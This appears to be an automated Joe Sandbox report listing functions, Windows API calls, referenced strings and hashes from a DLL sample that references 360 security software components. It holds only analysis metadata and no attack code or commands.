Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Value$_time64$HeapProcess
String ID: %s_count$%s_lasttime$CloudCfg
API String ID: 1319719158-610660357
Opcode ID: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
Instruction ID: 831a43b99bf02356c207f364941f14581f3732c075b2ce428cfbfee20bf611f1
Opcode Fuzzy Hash: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
Instruction Fuzzy Hash: 6D416CB2701B4486EB51DB29D84079D37A1FB89BF8F048325AA2E577E5DF38C688C341

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005AAEC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000018005AB3A
PathAppendW.SHLWAPI ref: 000000018005AB4B

Part of subcall function 000000018001A470: CreateFileW.KERNEL32 ref: 000000018001A4E8
Part of subcall function 000000018001A470: GetFileSizeEx.KERNEL32 ref: 000000018001A4FF
Part of subcall function 000000018001A470: ??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001A51D
Part of subcall function 000000018001A470: ReadFile.KERNEL32 ref: 000000018001A53A
Part of subcall function 000000018001A470: CloseHandle.KERNEL32 ref: 000000018001A567

??_U@YAPEAX_K@Z.MSVCRT ref: 000000018005ABCC
memmove.MSVCRT ref: 000000018005ABDE
??_V@YAXPEAX@Z.MSVCRT ref: 000000018005ABEB

Strings

..\config\msgcenter64.dat, xrefs: 000000018005AB40

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$AppendCloseCreateHandleModuleNamePathReadSizememmove
String ID: ..\config\msgcenter64.dat
API String ID: 1552649294-925171115
Opcode ID: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
Instruction ID: 6037bf8a0cbc718679defd9cfc68d096276397db31603676c3dd85afabd3a34b
Opcode Fuzzy Hash: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
Instruction Fuzzy Hash: A1316032604B8886E751CF61E8447CDBBA4F389BD4F508115FEA917BA8CF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180056572
GetModuleFileNameW.KERNEL32 ref: 0000000180056589
PathAppendW.SHLWAPI ref: 00000001800565AD

Part of subcall function 0000000180056400: memset.MSVCRT ref: 00000001800564A0
Part of subcall function 0000000180056400: RegCloseKey.ADVAPI32 ref: 00000001800564F2

_wcsicmp.MSVCRT ref: 00000001800565C8
PathAppendW.SHLWAPI ref: 00000001800565DE
PathFileExistsW.SHLWAPI ref: 00000001800565FA

Strings

safemon\360EDRSensor.exe, xrefs: 00000001800565D2

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
String ID: safemon\360EDRSensor.exe
API String ID: 2297386589-1382049097
Opcode ID: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
Instruction ID: b56041483c5d1cc8e669a9f5834781a952b0b95e5cd2a6710febed08a80e77bc
Opcode Fuzzy Hash: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
Instruction Fuzzy Hash: 44315071724A4886EA91DB24EC9439973A0FB8C7A4F409215B96E436F5EF39C74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800562D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018005630E
GetModuleFileNameW.KERNEL32 ref: 0000000180056325
PathAppendW.SHLWAPI ref: 0000000180056349

Part of subcall function 000000018005619C: memset.MSVCRT ref: 000000018005623C
Part of subcall function 000000018005619C: RegCloseKey.ADVAPI32 ref: 000000018005628E

_wcsicmp.MSVCRT ref: 0000000180056364
PathAppendW.SHLWAPI ref: 000000018005637A
PathFileExistsW.SHLWAPI ref: 0000000180056396

Strings

safemon\360ExtHost.exe, xrefs: 000000018005636E

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
String ID: safemon\360ExtHost.exe
API String ID: 2297386589-1382862812
Opcode ID: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
Instruction ID: 6ff1a21142ab4c8bd4a0b27ef24c26924cb25d1c518f26ee789ee6da218a3a52
Opcode Fuzzy Hash: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
Instruction Fuzzy Hash: E7316F71724A4886EBA1DB24EC943997360FB8C7A4F409215B96E836F5DF39C74CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000892C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180008966
GetProcAddress.KERNEL32 ref: 000000018000897B
RegOpenKeyExW.ADVAPI32 ref: 00000001800089CE
RegCloseKey.ADVAPI32 ref: 00000001800089E0

Strings

RegOpenKeyTransactedW, xrefs: 0000000180008971
Advapi32.dll, xrefs: 000000018000895F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
Instruction ID: bf9e62a3942db8529e652a7a00b11324bbad2056b1e05bdd0101147039c14a4a
Opcode Fuzzy Hash: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
Instruction Fuzzy Hash: E7218E32604B4482EB92DF02F8543A973A0FB8CBD0F088025AED947B54DF3CC659D701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004410C Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180044136
memset.MSVCRT ref: 0000000180044147
_time64.MSVCRT ref: 0000000180044156

Part of subcall function 000000018003BC0C: CryptAcquireContextW.ADVAPI32 ref: 000000018003BC33
Part of subcall function 000000018003BC0C: GetLastError.KERNEL32 ref: 000000018003BC3D
Part of subcall function 000000018003BC0C: CryptAcquireContextW.ADVAPI32 ref: 000000018003BC62

_time64.MSVCRT ref: 000000018004417C
srand.MSVCRT ref: 0000000180044185
rand.MSVCRT ref: 000000018004418B
LeaveCriticalSection.KERNEL32 ref: 00000001800441C5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AcquireContextCriticalCryptSection_time64$EnterErrorLastLeavememsetrandsrand
String ID:
API String ID: 1109857607-0
Opcode ID: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
Instruction ID: ca70be7a54b7a8b6e3e4f55ca6010b26a0c6ab118fec8c1b3c60b99ca43e49b7
Opcode Fuzzy Hash: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
Instruction Fuzzy Hash: 7521A132B10B4482E7559F25E84439C77A5FB99F98F059225DA690BBA5CF38C68AC300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004F468 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000018004F4BC
LeaveCriticalSection.KERNEL32 ref: 000000018004F506
GetModuleHandleW.KERNEL32 ref: 000000018004F518
GetProcAddress.KERNEL32 ref: 000000018004F529

Strings

Wow64RevertWow64FsRedirection, xrefs: 000000018004F522
kernel32, xrefs: 000000018004F511

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$AddressEnterHandleLeaveModuleProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 3003946417-3900151262
Opcode ID: 6f9c69537aee207e76f46cf012ddb25f35c479e924d9122b0865608856dfc553
Instruction ID: d8768edbf8454b7cfa73ea2a06319ccfd93a48644ed29c5473b77248e6d43ddc
Opcode Fuzzy Hash: 6f9c69537aee207e76f46cf012ddb25f35c479e924d9122b0865608856dfc553
Instruction Fuzzy Hash: 8D212C30605B0895EA929B24FD843E93360F74DBE9F559115E969073B1DF68C78EC304

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005760C Relevance: 10.6, APIs: 7, Instructions: 55windowCOMMON

Download Yara Rule

APIs

MonitorFromWindow.USER32 ref: 0000000180057634
GetForegroundWindow.USER32 ref: 000000018005763D
IsWindow.USER32 ref: 0000000180057657
IsWindowVisible.USER32 ref: 0000000180057664
MonitorFromWindow.USER32 ref: 0000000180057676
GetWindow.USER32 ref: 00000001800576A1
GetForegroundWindow.USER32 ref: 00000001800576AC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Window$ForegroundFromMonitor$Visible
String ID:
API String ID: 262661973-0
Opcode ID: 50d6c86a5c954526de36236bf2b34abfcf45b580831625f5d8fda67e30c87f8d
Instruction ID: 1a089d366b8620dc2648cd5d079bf33926917e3ecc8d752c4a23f5f376d80d5e
Opcode Fuzzy Hash: 50d6c86a5c954526de36236bf2b34abfcf45b580831625f5d8fda67e30c87f8d
Instruction Fuzzy Hash: DC118E35708A0881FAA18B15A9443A9A7E5F38CFC4F198024FE8E57B65DF3DC64A9780

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180084E36 Relevance: 10.6, APIs: 7, Instructions: 50memorysynchronizationCOMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180084E55

Part of subcall function 000000018006DB10: GetProcessHeap.KERNEL32 ref: 000000018006DB1C
Part of subcall function 000000018006DB10: HeapLock.KERNEL32 ref: 000000018006DB2D
Part of subcall function 000000018006DB10: HeapWalk.KERNEL32 ref: 000000018006DB40
Part of subcall function 000000018006DB10: HeapFree.KERNEL32 ref: 000000018006DB88
Part of subcall function 000000018006DB10: HeapUnlock.KERNEL32 ref: 000000018006DB91

ReleaseMutex.KERNEL32 ref: 0000000180084E73
TlsFree.KERNEL32 ref: 0000000180084E8D
CloseHandle.KERNEL32 ref: 0000000180084E9B
GetProcessHeap.KERNEL32 ref: 0000000180084EAA
HeapFree.KERNEL32 ref: 0000000180084EBD
CloseHandle.KERNEL32 ref: 0000000180084ECD

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$CloseHandleProcess$ExceptionLockMutexReleaseThrowUnlockWalk
String ID:
API String ID: 2337826640-0
Opcode ID: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
Instruction ID: 33d5259c6290a7581a5ad5f3dc980324b092c5f168283266ec493f33f9dd72fa
Opcode Fuzzy Hash: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
Instruction Fuzzy Hash: BB111632601A49CAEB869F21EC543E82360FB4CBD5F19D525BA190B6A5DF34C75DC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064040 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000018006405B
SysFreeString.OLEAUT32 ref: 0000000180064070
SysFreeString.OLEAUT32 ref: 0000000180064085
SysFreeString.OLEAUT32 ref: 000000018006409A
SysFreeString.OLEAUT32 ref: 00000001800640AF
SysFreeString.OLEAUT32 ref: 00000001800640C4
SysFreeString.OLEAUT32 ref: 00000001800640D9

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
Instruction ID: c87333ac7bcb44b69379473da2adcf9225e28ba0b3bfb3a3c4204cf647e2c29f
Opcode Fuzzy Hash: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
Instruction Fuzzy Hash: B5110337612B08C6FB96DF64D8583682360FB5DFA9F258704DA6B49599CF38C64DC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018E8C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018E96
CreateFileW.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018EC6
DeviceIoControl.KERNEL32 ref: 0000000180018F04
CloseHandle.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018F0F

Strings

\\.\360SelfProtection, xrefs: 0000000180018E9E
L ", xrefs: 0000000180018EFC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseControlCreateCurrentDeviceFileHandleProcess
String ID: L "$\\.\360SelfProtection
API String ID: 3778458602-907869749
Opcode ID: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
Instruction ID: 4989c80b025c73f727db9230e342af37d309858987cbaecb77f10a65d22bbdba
Opcode Fuzzy Hash: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
Instruction Fuzzy Hash: F6111C32618B84D7C7518F64F88478AB7A0F78C7A4F444725E6AA43B68EF78C65CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800184B8 Relevance: 9.3, APIs: 6, Instructions: 270COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000180018666
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001868A
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800186B7
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800186D7

Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 0000000180042FFB
Part of subcall function 0000000180042FC4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043016
Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 000000018004306B

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018867

Part of subcall function 000000018004388C: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043AB7

Part of subcall function 0000000180043F2C: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180044096

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$??3@
String ID:
API String ID: 652292005-0
Opcode ID: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
Instruction ID: 16cab60fb696caa1ac382d07db4514fcd7f2788f0d4e97422f2d8c76aa010f09
Opcode Fuzzy Hash: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
Instruction Fuzzy Hash: 95C14A32B00B449AEB61CFA1E8407DD33B6F748798F548125EE9967B98DF34C62AD344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004D74 Relevance: 9.2, APIs: 6, Instructions: 219COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0000000180004E12
wcsstr.MSVCRT ref: 0000000180004E38
wcsstr.MSVCRT ref: 0000000180004EF1
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,0000000180001A9F), ref: 0000000180004F53
wcsstr.MSVCRT ref: 0000000180004FBE
_errno.MSVCRT ref: 000000018000504A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcsstr$_errnomemmove
String ID:
API String ID: 3323953840-0
Opcode ID: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
Instruction ID: 824f22201ec0d57d4a2227744580b71807502b4fbd2fda829f419a9b6e1dff6e
Opcode Fuzzy Hash: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
Instruction Fuzzy Hash: CF810572701A4881EAA6DB14A4447AE77A0FB4CBE4F15C215FFAE4B7D4DE38C6498704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013600 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 203COMMON

Download Yara Rule

Strings

combo, xrefs: 0000000180013796
mid, xrefs: 000000018001369B
product, xrefs: 000000018001375E

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: combo$mid$product
API String ID: 0-992679775
Opcode ID: e5130312c800340fa7b9c4fc8fca0e2c09fb1440a4f1e916ae566225171d111c
Instruction ID: c8dbd6f08156355df5cc37560490d906f7b4f661c1b1c18742a1636a8474de34
Opcode Fuzzy Hash: e5130312c800340fa7b9c4fc8fca0e2c09fb1440a4f1e916ae566225171d111c
Instruction Fuzzy Hash: C191BB32600E48A5EB92DB60C4423DD27B0F748BD8F949226FA5D57A96DF74C78EC340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800505E0 Relevance: 9.2, APIs: 6, Instructions: 196networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 0000000180050638
WSCDeinstallProvider.WS2_32 ref: 00000001800507A4
WSCDeinstallProvider32.WS2_32 ref: 00000001800507AC
WSCDeinstallProvider.WS2_32 ref: 0000000180050862
WSCDeinstallProvider32.WS2_32 ref: 000000018005086A
WSACleanup.WS2_32 ref: 00000001800508F4

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Deinstall$ProviderProvider32$CleanupStartup
String ID:
API String ID: 348239931-0
Opcode ID: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
Instruction ID: c360e4d789f3669f84b45de69cf2c2640493478b51e108b497c61621dba60db4
Opcode Fuzzy Hash: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
Instruction Fuzzy Hash: 48910332604A88C6EB92CB65E4547EE77A4F78C7E4F618111FA8D276A4DF39C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180032E5C Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032EF4
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032F07
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032F1A
SysFreeString.OLEAUT32 ref: 0000000180032F63
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032F76
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032F89

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
Instruction ID: 472ff7a9124bb4c66568a88574ce92508997c8508967d0cb70e73e2f7ddd2399
